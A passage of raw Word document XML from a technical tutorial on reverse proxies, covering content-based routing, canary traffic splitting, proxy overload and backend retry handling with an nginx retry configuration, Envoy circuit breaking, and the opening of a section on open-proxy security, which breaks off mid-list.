      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Header growth:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Each proxy may add headers (X-Forwarded-For, trace IDs, timing headers). The request grows with each hop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B17F52" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.2 Content-Based Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6E2AE8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Path-based routing (most common):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C70D002" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE8D2BD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>/api/users/*     → user-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E979CD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>/api/orders/*    → order-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF2587C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>/api/products/*  → product-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B394A90" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>/static/*        → CDN / static file server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEE5506" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Header-based routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4540916F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59182963" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>X-API-Version: 2  → v2 backend pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF8A18C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>X-API-Version: 1  → v1 backend pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735A1E85" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>X-Canary: true    → canary backend pool (5% of instances running new version)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6351CA07" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cookie-based routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C0562B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B6917B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Cookie contains "beta=true" → beta backend pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF7D7B4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Otherwise → stable backend pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511ADAD3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Weight-based traffic splitting (canary deployments):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E49A09B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A30684" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>95% of traffic → stable-v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3DD63D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>5% of traffic  → canary-v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6550A54B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The proxy randomly assigns each request based on configured weights. Enables gradual rollouts with instant rollback (change weight to 0%).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E224DB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="522CB708">
          <v:rect id="_x0000_i3332" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BACD401" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>17. Proxy Failure Modes and Resilience</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704DFA29" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.1 What Happens When the Proxy Itself Fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A82E1E4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Single proxy failure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A20D05B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="696"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>All traffic through that proxy is lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E5F586" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="696"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Clients get connection refused or timeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C08CD94" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="696"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>This is why proxies must be redundant (active-passive or active-active).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C36D93" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proxy overload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4F6CD4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="697"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Accept queue fills up → new connections rejected (kernel's SYN backlog exceeded).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0EE558" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="697"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Worker threads saturated → response latency skyrockets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C814320" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="697"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>File descriptors exhausted → accept() fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F8FA83" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="697"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Memory exhausted → OOM kill.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAF7643" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How to detect proxy overload (before it fails):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4558E026" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="698"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Monitor accept queue depth (ss -ltn shows backlog).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9BFCB9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="698"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Monitor worker connection count vs. worker_connections limit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643B4D20" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="698"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Monitor request queue time (time between accept and first byte processed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520AB1A5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.2 Backend Failure Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4DEBCB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retry logic at the proxy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5BB751" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>When a backend returns an error or times out:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38947FE9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="699"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Is the request safe to retry?</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> (Idempotent check)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FBCD42" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="699"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>GET, HEAD, OPTIONS → always safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFE3EFB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="699"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>POST, PUT, DELETE → only if explicitly configured (application guarantees idempotency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC3137F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="699"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Which errors trigger retry?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCFFA0E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="699"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Connection refused → backend is down, retry on another server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B8BBEF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="699"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Timeout → backend is slow, retry on another (be careful — original might still process).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520E994A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="699"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>502 Bad Gateway → upstream error, retry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151B8114" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="699"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>500 Internal Error → usually NOT retried (might be a deterministic bug).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B33A3E5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="699"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Where to retry?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67237AE8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="699"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Next server in the pool (round-robin to a different backend).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572EF3A4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="699"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Never retry on the same server that just failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F45C0DB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="699"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How many times?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72046912" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="699"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Typically 1–2 retries (not infinite — that amplifies load during outages).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3FDDBD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nginx retry configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632A5B6C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B022E2D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>proxy_next_upstream error timeout http_502 http_503;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB25C6C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>proxy_next_upstream_tries 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E90809D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>proxy_next_upstream_timeout 5s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A2D7A9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.3 The Proxy as a Circuit Breaker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3832F4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Envoy's built-in circuit breaking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19079C33" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Per-upstream cluster limits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54001709" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="700"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>max_connections: Maximum TCP connections to the cluster. Beyond this → overflow (503).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22808B30" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="700"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>max_pending_requests: Maximum requests queued waiting for a connection. Beyond this → overflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38687EE3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="700"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>max_requests: Maximum concurrent requests (HTTP/2 streams). Beyond this → overflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD8AB20" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="700"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>max_retries: Maximum concurrent retry requests. Prevents retry storms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6229AA3D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When limits are hit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7374C82A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The proxy returns 503 immediately (fail fast) rather than queuing indefinitely. This:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622FE393" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="701"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Prevents one slow backend from consuming all proxy resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623A6307" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="701"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Gives the backend breathing room to recover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F60192" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="701"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>The client gets a fast error and can handle it (retry later, show degraded content).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA72BD0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="1876A1C0">
          <v:rect id="_x0000_i3333" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54488215" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>18. Open Proxy vs. Closed Proxy — Security Implications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB35051" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18.1 Open Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061D3AD3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it is:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> A proxy that accepts connections from ANY client and forwards to ANY destination. No access control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A666CD2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this is dangerous if unintentional:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366988A9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="702"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Attackers use open proxies to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AC831B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="702"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
